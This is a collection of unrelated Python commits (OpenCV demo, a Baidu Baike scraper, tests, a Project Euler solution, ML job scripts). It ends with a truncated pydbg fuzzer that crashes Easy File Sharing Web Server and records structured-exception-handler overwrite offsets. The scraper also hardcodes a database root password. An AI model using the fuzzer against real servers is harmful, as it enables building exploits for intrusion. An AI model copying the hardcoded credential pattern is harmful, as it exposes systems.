img_gray = cv.cvtColor(img_bgr, cv.COLOR_BGR2GRAY)
# Threshold the Grayscale image: dst_i = (src_i > threshold_value) ? max_val : 0
threshold_value = cv.getTrackbarPos(trackbar1_name, trackbar1_window_name)
max_val = cv.getTrackbarPos(trackbar2_name, trackbar2_window_name)
ret, img_threshold_bin = cv.threshold(img_gray, threshold_value, max_val, cv.THRESH_BINARY)
# DISPLAY IMAGES ##################################
# Display the resulting frame (BGR)
cv.imshow('BGR (orignal)', img_bgr)
# Display the resulting frames (Threshold)
cv.imshow(window_name, img_threshold_bin)
# KEYBOARD LISTENER ###############################
if cv.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv.destroyAllWindows()
if __name__ == '__main__':
main()
| Python | 0.000018 | |
9a17f2ec043ed8e3f61549104507a87d21ae39e1 | Create baike_spider.py | school/baike_spider.py | school/baike_spider.py | """
a web spider for baidu baike schools info in beijing
"""
import logging.handlers
import os
import urllib.parse
import pandas as pd
import pymysql.cursors
import requests
from bs4 import BeautifulSoup
from lxml import etree
LOG_FILE = 'baikespider.log'
handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes=1024 * 1024, backupCount=5)
fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s'
formatter = logging.Formatter(fmt)
handler.setFormatter(formatter)
logger = logging.getLogger('baikespider')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
success_url_list = []
fail_url_list = []
class School():
def __init__(self, name='', en_name='', nick_name='', xiaoxun='', introduction='', start_time='', level='',
location='', detailed_history='', facility=''):
self.name = name
self.en_name = en_name
self.nick_name = nick_name
self.xiaoxun = xiaoxun
self.introduction = introduction
self.start_time = start_time
self.level = level
self.location = location
self.detailed_history = detailed_history
self.facility = facility
def __str__(self):
return "{ " + str(self.name) + " ;" + self.en_name + " ;" + str(self.xiaoxun) + " ;" + str(
self.introduction) + " ;" + self.start_time + " ;" + self.level + " ;" + self.location + " ;" \
+ self.detailed_history + " ;" + self.facility + " }"
def read_school_names(excel_path):
df = pd.read_excel(excel_path, sheetname="Sheet1", index_col=False)['名称']
return df.tolist()
def crawl(school_name):
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Host": "baike.baidu.com",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
}
request_url = "https://baike.baidu.com/item/%s" % urllib.parse.quote(school_name)
response = requests.get(request_url, timeout=10, headers=headers)
print('start crawling %s ' % school_name)
if response.status_code == 200:
school = School()
try:
html_raw = response.text.encode("Latin").decode("UTF-8")
soup = BeautifulSoup(html_raw, "html5lib")
name = soup.find_all("h1")[0].get_text() # 学校名称
introduction = soup.find_all(class_="para")[0].get_text().strip() # 学校简介
school.name = name
school.introduction = introduction
if len(soup.find_all(class_="basic-info cmn-clearfix")) > 0:
en_name = soup.find_all(class_="basicInfo-item value")[1].get_text().strip()
nick_name = soup.find_all(class_="basicInfo-item value")[2].get_text().strip() # 学校简称
xiaoxun = soup.find_all(class_="basicInfo-item value")[3].get_text().strip() # 学校校训
start_time = soup.find_all(class_="basicInfo-item value")[4].get_text().strip() # 创办时间
level = soup.find_all(class_="basicInfo-item value")[5].get_text().strip() # 学校类型
location = soup.find_all(class_="basicInfo-item value")[6].get_text().strip() # 所属地址
all_para_div = soup.find_all(class_="para")
detailed_history = "" # 学校历史
for _ in range(2, len(all_para_div) - 1, 1):
detailed_history += all_para_div[_].get_text().strip()
facility = all_para_div[-1].get_text() # 学校设施
school.en_name = en_name
school.nick_name = nick_name
school.xiaoxun = xiaoxun
school.start_time = start_time
school.level = level
school.location = location
school.detailed_history = detailed_history
school.facility = facility
except:
pass
else:
print('ERROR')
return school
def crawl_text(school_name):
text_dir = 'D:/schools/'
if not os.path.exists(text_dir):
os.makedirs(text_dir)
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Host": "baike.baidu.com",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
}
request_url = "https://baike.baidu.com/item/%s" % urllib.parse.quote(school_name)
response = requests.get(request_url, timeout=10, headers=headers)
print('start crawling %s ' % school_name)
if response.status_code == 200:
html_raw = response.text.encode("Latin").decode("UTF-8")
soup = BeautifulSoup(html_raw, "html5lib")
if "您所访问的页面不存在..." not in soup.text:
with open(os.path.join(text_dir, school_name + '.txt'), encoding='UTF-8', mode='wt') as f:
f.write(soup.find_all(class_="main-content")[0].get_text())
f.flush()
f.close()
logging.debug('%s has been written successfully~' % school_name)
else:
print("ERROR!")
def open_mysql():
connection = pymysql.connect(host='localhost',
user='root',
password='19930620',
db='hzau',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
return connection
def insert_to_mysql(school, connection):
try:
with connection.cursor() as cursor:
sql = "INSERT INTO school(name, en_name, nick_name, xiaoxun, introduction, start_time, level, location, detailed_history, facility)" \
" VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);"
cursor.execute(sql, (
school.name, school.en_name, school.nick_name, school.xiaoxun, school.introduction, school.start_time,
school.level, school.location, school.detailed_history, school.facility))
connection.commit()
with connection.cursor() as cursor:
# Read a single record
sql = "SELECT * FROM school"
cursor.execute(sql)
result = cursor.fetchone()
print(result)
except:
pass
def close_mysql(connection):
connection.close()
if __name__ == '__main__':
connection = open_mysql()
schoolnames = read_school_names("D:/采集.xlsx")
# for schoolname in schoolnames:
# crawl_text(schoolname)
for schoolname in schoolnames:
try:
school = crawl(schoolname)
if school is not None and school.name != "":
insert_to_mysql(school, connection)
logging.info(school.name)
except:
pass
close_mysql(connection)
| Python | 0.000267 | |
9469bcf60a199b96d1fec778c44346df744a1d60 | add jieba | jieba/test_jieba.py | jieba/test_jieba.py | #!/usr/bin/env python
# encoding=utf-8
import jieba
seg_list = jieba.cut("我来到北京清华大学", cut_all=True)
print("Full Mode: " + "/ ".join(seg_list)) # 全模式
seg_list = jieba.cut("我来到北京清华大学", cut_all=False)
print("Default Mode: " + "/ ".join(seg_list)) # 精确模式
seg_list = jieba.cut("他来到了网易杭研大厦") # 默认是精确模式
print(", ".join(seg_list))
# 搜索引擎模式
seg_list = jieba.cut_for_search("小明硕士毕业于中国科学院计算所,后在日本京都大学深造")
print(", ".join(seg_list))
| Python | 0.999974 | |
291e7c8b2a69f26f6343269aaac2b9e3cd517220 | Add tests | readthedocs/proxito/tests/test_proxied_api.py | readthedocs/proxito/tests/test_proxied_api.py | from readthedocs.rtd_tests.tests.test_footer import TestFooterHTML
from django.test import override_settings
@override_settings(ROOT_URLCONF='readthedocs.proxito.urls')
class TestProxiedFooterHTML(TestFooterHTML):
def setUp(self):
super().setUp()
self.host = 'pip.readthedocs.io'
def render(self):
r = self.client.get(self.url, HTTP_HOST=self.host)
return r
| Python | 0.00001 | |
081b5aabae205ad7c23c512be15ee26276dc8a29 | Check whether Azure CLI is in ARM mode | perfkitbenchmarker/providers/azure/util.py | perfkitbenchmarker/providers/azure/util.py | # Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Verify that Azure CLI is in arm mode."""
from perfkitbenchmarker import events
from perfkitbenchmarker import providers
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers import azure
class BadAzureCLIModeError(Exception):
pass
def _CheckAzureCLIMode(sender):
assert sender == providers.AZURE, sender
stdout, _ = vm_util.IssueRetryableCommand(
[azure.AZURE_PATH, 'config'])
if 'Current Mode: arm' not in stdout:
raise BadAzureCLIModeError('Azure CLI may not be in ARM mode.')
events.provider_imported.connect(_CheckAzureCLIMode, providers.AZURE,
weak=False)
| Python | 0 | |
95a86efeadc15f3edc83cbfe64c6d725b1eaf0bd | revert unneeded None checks | web/scripts/load_agagd_data.py | web/scripts/load_agagd_data.py | from app.models import db, Game, GoServer, Player, User
from app.tokengen import generate_token
from flask.ext.script import Command, Option
from scripts.parsing import agagd_parser, pin_change_parser
from uuid import uuid4
"""Script which loads game and user data from an AGAGD SQL dump and file with PIN changes."""
def create_server(name):
server = GoServer()
server.name = name
server.url = ''
server.token = generate_token()
db.session.add(server)
db.session.commit()
return server.id
class AGAHistoricalGamesLoader(Command):
"""Class which holds a little bit of state used while loading the AGAGD data."""
option_list = (
Option('--sql_dump', '-d', dest='agagd_dump_filename'),
Option('--pin_changes', '-p', dest='pin_change_dump_filename')
)
def setup(self, pin_change_dump_filename):
"""Stand-in for __init__ because we don't have necessary information
at construction time, and we are constructed regardless of whether
this script is being run or not.
"""
name = 'AGA'
server = db.session.query(GoServer).filter_by(name=name).first()
if server:
self.server_id = server.id
else:
print('Creating AGA Server object')
self.server_id = create_server(name)
self._users = {}
# map: old_pin -> new_pin
with open(pin_change_dump_filename) as f:
self._pin_changes = {line['old']: line['new'] for line in pin_change_parser(f)
if line['old'] != line['new']} # Prevents infinite lookup loops
def get_or_make_user(self, aga_id):
"""Gets or creates a fake User object for an AGA ID,
along with an AGA player
If the AGA ID has had one or more PIN changes, the most recent ID will
be used.
"""
while aga_id in self._pin_changes:
aga_id = self._pin_changes[aga_id]
if aga_id in self._users:
return self._users[aga_id]
else:
user = User(aga_id=aga_id, email=uuid4(), fake=True)
db.session.add(user)
db.session.commit()
player = Player(id=aga_id, name='', user_id=user.id, server_id=self.server_id, token=uuid4())
db.session.add(player)
self._users[aga_id] = user
return user
def store_game(self, row):
user1 = self.get_or_make_user(row['Pin_Player_1'])
user2 = self.get_or_make_user(row['Pin_Player_2'])
white_user, black_user = (user1, user2) if row['Color_1'] == 'W' else (user2, user1)
game = Game(id=row['Game_ID'],
server_id=self.server_id,
white_id=white_user.aga_id,
black_id=black_user.aga_id,
date_played=row['Game_Date'],
date_reported=row['Game_Date'],
result=row['Result'],
rated=row['Rated'],
handicap=row['Handicap'],
komi=row['Komi'])
db.session.add(game)
def load_data(self, filename):
# server_id = create_server()
with open(filename) as f:
for i, row in enumerate(agagd_parser(f)):
if i % 1000 == 0:
print('-Loading row', i)
db.session.commit()
print('Committed', i)
self.store_game(row)
def run(self, agagd_dump_filename, pin_change_dump_filename):
self.setup(pin_change_dump_filename)
self.load_data(agagd_dump_filename)
db.session.commit()
| from app.models import db, Game, GoServer, Player, User
from app.tokengen import generate_token
from flask.ext.script import Command, Option
from scripts.parsing import agagd_parser, pin_change_parser
from uuid import uuid4
"""Script which loads game and user data from an AGAGD SQL dump and file with PIN changes."""
def create_server(name):
server = GoServer()
server.name = name
server.url = ''
server.token = generate_token()
db.session.add(server)
db.session.commit()
return server.id
class AGAHistoricalGamesLoader(Command):
"""Class which holds a little bit of state used while loading the AGAGD data."""
option_list = (
Option('--sql_dump', '-d', dest='agagd_dump_filename'),
Option('--pin_changes', '-p', dest='pin_change_dump_filename')
)
def setup(self, pin_change_dump_filename):
"""Stand-in for __init__ because we don't have necessary information
at construction time, and we are constructed regardless of whether
this script is being run or not.
"""
name = 'AGA'
server = db.session.query(GoServer).filter_by(name=name).first()
if server:
self.server_id = server.id
else:
print('Creating AGA Server object')
self.server_id = create_server(name)
self._users = {}
# map: old_pin -> new_pin
with open(pin_change_dump_filename) as f:
self._pin_changes = {line['old']: line['new'] for line in pin_change_parser(f)
if line['old'] != line['new']} # Prevents infinite lookup loops
def get_or_make_user(self, aga_id):
"""Gets or creates a fake User object for an AGA ID,
along with an AGA player
If the AGA ID has had one or more PIN changes, the most recent ID will
be used.
"""
while aga_id in self._pin_changes:
if self._pin_changes[aga_id] is None:
print ("Pin would change to none: %s" % aga_id)
aga_id = self._pin_changes[aga_id]
if aga_id in self._users:
return self._users[aga_id]
else:
user = User(aga_id=aga_id, email=uuid4(), fake=True)
db.session.add(user)
db.session.commit()
player = Player(id=aga_id, name='', user_id=user.id, server_id=self.server_id, token=uuid4())
db.session.add(player)
self._users[aga_id] = user
return user
def store_game(self, row):
if row['Pin_Player_1'] is None or row['Pin_Player_2'] is None:
print(row)
user1 = self.get_or_make_user(row['Pin_Player_1'])
user2 = self.get_or_make_user(row['Pin_Player_2'])
white_user, black_user = (user1, user2) if row['Color_1'] == 'W' else (user2, user1)
game = Game(id=row['Game_ID'],
server_id=self.server_id,
white_id=white_user.aga_id,
black_id=black_user.aga_id,
date_played=row['Game_Date'],
date_reported=row['Game_Date'],
result=row['Result'],
rated=row['Rated'],
handicap=row['Handicap'],
komi=row['Komi'])
db.session.add(game)
def load_data(self, filename):
# server_id = create_server()
with open(filename) as f:
for i, row in enumerate(agagd_parser(f)):
if i % 1000 == 0:
print('-Loading row', i)
db.session.commit()
print('Committed', i)
self.store_game(row)
def run(self, agagd_dump_filename, pin_change_dump_filename):
self.setup(pin_change_dump_filename)
self.load_data(agagd_dump_filename)
db.session.commit()
| Python | 0.000005 |
59edefb410b932a648347f76ca9a96013b40a08e | Add solution 303 | Problem_300_399/euler_303.py | Problem_300_399/euler_303.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Problem 303
For a positive integer n, define f(n) as the least positive multiple of n that, written in base 10, uses only digits ≤ 2.
Thus f(2)=2, f(3)=12, f(7)=21, f(42)=210, f(89)=1121222.
Also, . n = 1 ~ 100, f(n)/n = 11363107
Find . n = 1 ~ 10000, f(n)/n = ?
'''
from itertools import cycle, product
from functools import reduce
'''
mul = [ [1],
[1, 1, 8],
[1, 4, 1, 4],
[4, 3, 3],
[3, 2, 3, 2],
[2],
[2, 3, 2, 3],
[3, 3, 4],
[4, 1, 4, 1],
[8, 1, 1]]
def digit_012_check(n):
while n != 0:
d, m = divmod(n, 10)
if m > 2:
return False
n = d
return True
def fn(n):
if digit_012_check(n):
print([n], '-', 1, n)
return 1
#mul = [ [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
# [0, 1, 2],
# [0, 1, 5, 6],
# [0, 4, 7],
# [0, 3, 5, 8],
# [0, 2, 4, 6, 8],
# [0, 2, 5, 7,],
# [0, 3, 6],
# [0, 4, 5, 9],
# [0, 8, 9]]
j = 0
for i in cycle(mul[n % 10]):
j += i
m = n * j
if digit_012_check(m):
print([n], i, j, m)
return j
'''
def p303(): # Answer: 1111981904675169, pretty awful though
L = 10000 + 1
check = [x for x in range(3, L)]
result = [0] * L
result[0] = 1
result[1] = 1
result[2] = 2
# run and check only 9990
# Found 111333555778 * 9990 = 1112222222222220
result[9990] = 1112222222222220
# by hand
# 9990 answer -> 111333555778
# attach [1] -> 1111333555778
# attach [3] -> 11113333555778
# attach [5] -> 111133335555778
# attach [7] -> 1111333355557778
# found -> 1111333355557778
result[9999] = 11112222222222222222
check.remove(9990)
check.remove(9999)
for i in product([0, 1, 2], repeat=30):
n = int(reduce(lambda x, y: str(x) + str(y), i))
temp = []
for c in check:
if n % c == 0:
if n == 0:
break
result[c] = n
temp.append(c)
# print([n], c, len(check), check)
for t in temp:
check.remove(t)
if 0 not in result:
break
total = 0
for i in range(1, len(result)):
# print([i], result[i])
total += result[i] // i
print(total)
p303()
| Python | 0.999003 | |
6705e0e23d13a94726556714e11dfbb7a916877d | Add basic mechanism to override the default EntryAdmin | zinnia_wymeditor/admin.py | zinnia_wymeditor/admin.py | """EntryAdmin for zinnia-wymeditor"""
from django.contrib import admin
from zinnia.models import Entry
from zinnia.admin.entry import EntryAdmin
class EntryAdminWYMEditorMixin(object):
"""
Mixin adding WYMeditor for editing Entry.content field.
"""
pass
class EntryAdminWYMEditor(EntryAdminWYMEditorMixin,
EntryAdmin):
"""
Enrich the default EntryAdmin with WYMEditor.
"""
pass
admin.site.unregister(Entry)
admin.site.register(Entry, EntryAdminWYMEditor)
| Python | 0.000001 | |
6193786bb2307550ab9dfb9c218f6d8b3f407156 | Create is-graph-bipartite.py | Python/is-graph-bipartite.py | Python/is-graph-bipartite.py | # Time: O(|V| + |E|)
# Space: O(|V|)
# Given a graph, return true if and only if it is bipartite.
#
# Recall that a graph is bipartite if we can split it's set of nodes into
# two independent subsets A and B such that every edge in the graph has
# one node in A and another node in B.
#
# The graph is given in the following form: graph[i] is a list of indexes j
# for which the edge between nodes i and j exists.
# Each node is an integer between 0 and graph.length - 1.
# There are no self edges or parallel edges: graph[i] does not contain i,
# and it doesn't contain any element twice.
#
# Example 1:
# Input: [[1,3], [0,2], [1,3], [0,2]]
# Output: true
# Explanation:
# The graph looks like this:
# 0----1
# | |
# | |
# 3----2
# We can divide the vertices into two groups: {0, 2} and {1, 3}.
#
# Example 2:
# Input: [[1,2,3], [0,2], [0,1,3], [0,2]]
# Output: false
# Explanation:
# The graph looks like this:
# 0----1
# | \ |
# | \ |
# 3----2
# We cannot find a way to divide the set of nodes into two independent ubsets.
#
# Note:
# - graph will have length in range [1, 100].
# - graph[i] will contain integers in range [0, graph.length - 1].
# - graph[i] will not contain i or duplicate values.
class Solution(object):
def isBipartite(self, graph):
"""
:type graph: List[List[int]]
:rtype: bool
"""
color = {}
for node in xrange(len(graph)):
if node in color:
continue
stack = [node]
color[node] = 0
while stack:
curr = stack.pop()
for neighbor in graph[curr]:
if neighbor not in color:
stack.append(neighbor)
color[neighbor] = color[curr] ^ 1
elif color[neighbor] == color[curr]:
return False
return True
| Python | 0.000326 | |
3204227799ce5f7a7d0df4cb6b480b42d6cdae1f | Add a snippet. | python/pyqt/pyqt5/widget_QPainter_OpenGL.py | python/pyqt/pyqt5/widget_QPainter_OpenGL.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# See https://doc.qt.io/archives/4.6/opengl-2dpainting.html
import sys
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QPainter, QBrush, QPen
from PyQt5.QtCore import Qt
from PyQt5.QtOpenGL import QGLWidget
class MyPaintWidget(QGLWidget):
def __init__(self):
super().__init__()
# Set window background color
self.setAutoFillBackground(True)
palette = self.palette()
palette.setColor(self.backgroundRole(), Qt.white)
self.setPalette(palette)
def paintEvent(self, event):
qp = QPainter(self)
qp.setPen(QPen(Qt.black, 5, Qt.SolidLine))
qp.setBrush(QBrush(Qt.red, Qt.SolidPattern))
qp.setRenderHint(QPainter.Antialiasing) # <- Set anti-aliasing See https://wiki.python.org/moin/PyQt/Painting%20and%20clipping%20demonstration
qp.drawEllipse(100, 15, 400, 200)
qp.setBrush(QBrush(Qt.red, Qt.DiagCrossPattern))
qp.drawEllipse(600, 15, 200, 200)
if __name__ == '__main__':
app = QApplication(sys.argv)
widget = MyPaintWidget()
widget.show()
# The mainloop of the application. The event handling starts from this point.
# The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead.
exit_code = app.exec_()
# The sys.exit() method ensures a clean exit.
# The environment will be informed, how the application ended.
sys.exit(exit_code)
| Python | 0.000002 | |
ae3bd406736f9235b442c52bf584a97d0760a588 | add api | buildbot_travis/api.py | buildbot_travis/api.py | # Copyright 2012-2013 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from buildbot import config
from klein import Klein
from twisted.internet import defer
from twisted.internet import threads
import yaml
import json
from buildbot.util.eventual import eventually
def getDbConfigObjectId(master, name="config"):
return master.db.state.getObjectId(name, "DbConfig")
class Api(object):
app = Klein()
_yamlPath = None
_useDbConfig = False
_in_progress = False
def __init__(self, ep):
self.ep = ep
def setYamlPath(self, path):
self._yamlPath = path
def useDbConfig(self):
self._useDbConfig = True
def setCfg(self, cfg):
self._cfg = cfg
self._in_progress = False
@defer.inlineCallbacks
def saveCfg(self, cfg):
if self._yamlPath is not None:
cfg = yaml.safe_dump(cfg, default_flow_style=False, indent=4)
with open(self._yamlPath, "w") as f:
f.write(cfg)
if self._useDbConfig:
oid = yield getDbConfigObjectId(self.ep.master)
yield self.ep.master.db.state.setState(oid, "travis", cfg)
@app.route("/config", methods=['GET'])
def getConfig(self, request):
return json.dumps(self._cfg)
def thdCheckConfig(self):
# check the config in thread
try:
config.MasterConfig.loadConfig(self.ep.master.basedir, self.ep.master.configFileName)
except config.ConfigErrors, e:
return e.errors
return None
@app.route("/config", methods=['PUT'])
@defer.inlineCallbacks
def saveConfig(self, request):
"""I save the config, and run check_config, potencially returning errors"""
request.setHeader('Content-Type', 'application/json')
if self._in_progress:
defer.returnValue(json.dumps({'success': False, 'errors': ['reconfig already in progress']}))
self._in_progress = True
cfg = json.loads(request.content.read())
if cfg != self._cfg:
yield self.saveCfg(cfg)
try:
err = yield threads.deferToThread(self.thdCheckConfig)
except Exception as e:
err = [repr(e)]
if err is not None:
self._in_progress = False
yield self.saveCfg(self._cfg)
defer.returnValue(json.dumps({'success': False, 'errors': err}))
yield self.ep.master.reconfig()
defer.returnValue(json.dumps({'success': True}))
| Python | 0 | |
d19ab50f2d3b259bd6c5cfb21b4087ca4d3ec248 | create theano 2 | theanoTUT/theano2_install.py | theanoTUT/theano2_install.py | # View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
# 2 - Install theano
"""
requirements:
1. python 2 >=2.6 or python 3>=3.3
2. Numpy >= 1.7.1
3. Scipy >=0.11
If using CPU, no other requirement.
But if using GPU, you will need NVIDIA CUDA drivers and SDK.
The must easy way to install theano is to use pip install.
1. open your terminal (MacOS and Linux), or your command window (Windows)
2. type "pip install theano" (for python 2x); type "pip3 install theano" (for python 3x)
Note: to install theano on Windows machine may be a little bit stuggling. If you encounter any
problem, please refer to this web page:
http://deeplearning.net/software/theano/install_windows.html#install-windows
""" | Python | 0 | |
389adca1fd52747814f370de2d066a1743544469 | Solve Game Time in python | solutions/beecrowd/1046/1046.py | solutions/beecrowd/1046/1046.py | start, end = map(int, input().split())
if start == end:
result = 24
elif end - start >= 0:
result = end - start
else:
result = 24 + end - start
print(f'O JOGO DUROU {result} HORA(S)')
| Python | 0.999996 | |
3a9627f31846e06e04d7ae933712840d52616663 | Create main.py | main.py | main.py | import pygame
import game
file = 'music.mp3'
pygame.init()
pygame.mixer.init()
pygame.mixer.music.load(file)
pygame.mixer.music.play(loops=-1)
pygame.mixer.music.set_volume(0.5)
run = True
SuperHeroTower = game.Game()
while run:
run = SuperHeroTower.startScreen()
pygame.quit()
quit()
| Python | 0.000001 | |
8cf6b638a7f3bf229526451076dc27e990be5391 | increase hyperparam grid for TransE in FB15K (margin) | scripts/fb15k/UCL_FB15K_adv_v1.1.py | scripts/fb15k/UCL_FB15K_adv_v1.1.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import itertools
import os.path
import sys
import argparse
import logging
def cartesian_product(dicts):
return (dict(zip(dicts, x)) for x in itertools.product(*dicts.values()))
def summary(configuration):
kvs = sorted([(k, v) for k, v in configuration.items()], key=lambda e: e[0])
return '_'.join([('%s=%s' % (k, v)) for (k, v) in kvs])
def to_cmd(c, _path=None):
if _path is None:
_path = '/home/pminervi/workspace/inferbeddings/'
command = 'python3 {}/bin/adv-cli.py' \
' --train {}/data/fb15k/freebase_mtr100_mte100-train.txt' \
' --valid {}/data/fb15k/freebase_mtr100_mte100-valid.txt' \
' --test {}/data/fb15k/freebase_mtr100_mte100-test.txt' \
' --clauses {}/data/fb15k/clauses/clauses_0.999.pl' \
' --nb-epochs {}' \
' --lr {}' \
' --nb-batches {}' \
' --model {}' \
' --similarity {}' \
' --margin {}' \
' --embedding-size {}' \
' --adv-lr {} --adv-init-ground --adversary-epochs {}' \
' --discriminator-epochs {} --adv-weight {} --adv-batch-size {}' \
''.format(_path, _path, _path, _path, _path,
c['epochs'], c['lr'], c['batches'],
c['model'], c['similarity'],
c['margin'], c['embedding_size'],
c['adv_lr'], c['adv_epochs'],
c['disc_epochs'], c['adv_weight'], c['adv_batch_size'])
return command
def to_logfile(c, path):
outfile = "%s/ucl_fb15k_adv_v1.1.%s.log" % (path, summary(c))
return outfile
def main(argv):
def formatter(prog):
return argparse.HelpFormatter(prog, max_help_position=100, width=200)
argparser = argparse.ArgumentParser('Generating experiments for the UCL cluster', formatter_class=formatter)
argparser.add_argument('--debug', '-D', action='store_true', help='Debug flag')
argparser.add_argument('--path', '-p', action='store', type=str, default=None, help='Path')
args = argparser.parse_args(argv)
hyperparameters_space = dict(
epochs=[100],
optimizer=['adagrad'],
lr=[.1],
batches=[10],
model=['TransE'],
similarity=['l1', 'l2'],
margin=[2, 5, 10],
embedding_size=[20, 50, 100, 150, 200],
adv_lr=[.1],
adv_epochs=[0, 1, 10],
disc_epochs=[1, 10],
adv_weight=[0, 1, 10, 100, 1000, 10000],
adv_batch_size=[1, 10, 100]
)
configurations = cartesian_product(hyperparameters_space)
path = '/home/pminervi/workspace/inferbeddings/logs/ucl_fb15k_adv_v1.1/'
if not os.path.exists(path):
os.makedirs(path)
for job_id, cfg in enumerate(configurations):
logfile = to_logfile(cfg, path)
completed = False
if os.path.isfile(logfile):
with open(logfile, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
completed = '### MICRO (test filtered)' in content
if not completed:
line = '{} >> {} 2>&1'.format(to_cmd(cfg, _path=args.path), logfile)
if args.debug:
print(line)
else:
file_name = 'ucl_fb15k_adv_v1.1_{}.job'.format(job_id)
alias = ''
job_script = '#$ -S /bin/bash\n' \
'#$ -wd /home/pminervi/workspace/jobs/\n' \
'#$ -l h_vmem=8G,tmem=8G\n' \
'#$ -l h_rt=48:00:00\n' \
'{}\n{}\n'.format(alias, line)
with open(file_name, 'w') as f:
f.write(job_script)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(sys.argv[1:])
| Python | 0 | |
bc3f7e83bd35f1a6ae8add35932513c7da47076e | fix a typo. | restclients/test/util/datetime_convertor.py | restclients/test/util/datetime_convertor.py | from django.test import TestCase
from datetime import date, datetime
from restclients.util.datetime_convertor import convert_to_begin_of_day,\
convert_to_end_of_day
class DatetimeConvertorTest(TestCase):
def test_convert_to_begin_of_day(self):
self.assertEquals(convert_to_begin_of_day(date(2013, 4, 9)),
datetime(2013, 4, 9, 0, 0, 0))
self.assertEquals(
convert_to_begin_of_day(datetime(2013, 4, 9, 10, 10, 10)),
datetime(2013, 4, 9, 0, 0, 0))
def test_convert_to_end_of_day(self):
self.assertEquals(convert_to_end_of_day(date(2012, 2, 28)),
datetime(2012, 2, 29, 0, 0, 0))
self.assertEquals(
convert_to_end_of_day(datetime(2012, 2, 28, 10, 10, 10)),
datetime(2012, 2, 29, 0, 0, 0))
| from django.test import TestCase
from datetime import date, datetime
from restclients.util.datetime_convertor import convert_to_begin_of_day,\
convert_to_end_of_day
class DatetimeConvertorTest(TestCase):
def test_convert_to_begin_of_day(self):
self.assertEquals(convert_to_begin_of_day(date(2013, 4, 9)),
datetime(2013, 4, 9, 0, 0, 0))
self.assertEquals(
convert_to_begin_of_day(datetime(2013, 4, 9, 10, 10, 10)),
datetime(2013, 4, 9, 0, 0, 0))
def test_convert_to_end_of_day(self):
self.assertEquals(convert_to_end_of_day(date(2012, 2, 28)),
datetime(2013, 2, 29, 0, 0, 0))
self.assertEquals(
convert_to_end_of_day(datetime(2012, 2, 28, 10, 10, 10)),
datetime(2012, 2, 29, 0, 0, 0))
| Python | 0.03285 |
3b4f7b9792be0315aca7d71fafe1a972e5fd87f7 | Add Seh_bug_fuzzer.py | SEH_Fuzzer/Seh_bug_fuzzer.py | SEH_Fuzzer/Seh_bug_fuzzer.py | # -*- coding: utf-8 -*-
import time
import sys
import socket
import cPickle
import os
from pydbg import *
from pydbg.defines import *
from util import *
PICKLE_NAME = "fsws_phase1.pkl"
exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
import threading
import time
host, port = "127.0.0.1", 80
global Running
global Crash
global lock
global chance
global MAX_OFFSET
global OFFSET
chance = 2
Running = True
Crash = False
lock = threading.Lock()
def check_access_validation(dbg):
global chance
global Running
global lock
with lock:
if dbg.dbg.u.Exception.dwFirstChance:
chance -= 1
# prevent test next size.
Running = False
if chance==0:
Running = False
seh, nseh = dbg.seh_unwind()[0]
seh_offset = pattern_find(seh, MAX_OFFSET)
print "[+] crash in %d words" % OFFSET
print "[+] seh offset %s." % seh_offset
with open(PICKLE_NAME, "wb") as phase_file:
cPickle.dump(OFFSET, phase_file)
cPickle.dump(seh_offset, phase_file)
cPickle.dump(seh, phase_file)
cPickle.dump(nseh, phase_file)
with open("crash.txt", "w") as f:
f.write("seh: 0x%08x\n" % seh)
f.write("nseh: 0x%08x\n" % nseh)
f.write(dbg.dump_context(stack_depth=1000))
dbg.terminate_process()
return DBG_EXCEPTION_NOT_HANDLED
else:
Running = True
return DBG_EXCEPTION_NOT_HANDLED
return DBG_EXCEPTION_NOT_HANDLED
class Fuzzer(object):
def __init__(self, exe_path, max_offset = 8000):
self.exe_path = exe_path
self.pid = None
self.dbg = None
global MAX_OFFSET
MAX_OFFSET = max_offset
# self.running = True
self.dbgThread = threading.Thread(target=self.start_debugger)
self.dbgThread.setDaemon(False)
self.dbgThread.start()
# Wait debugger start process
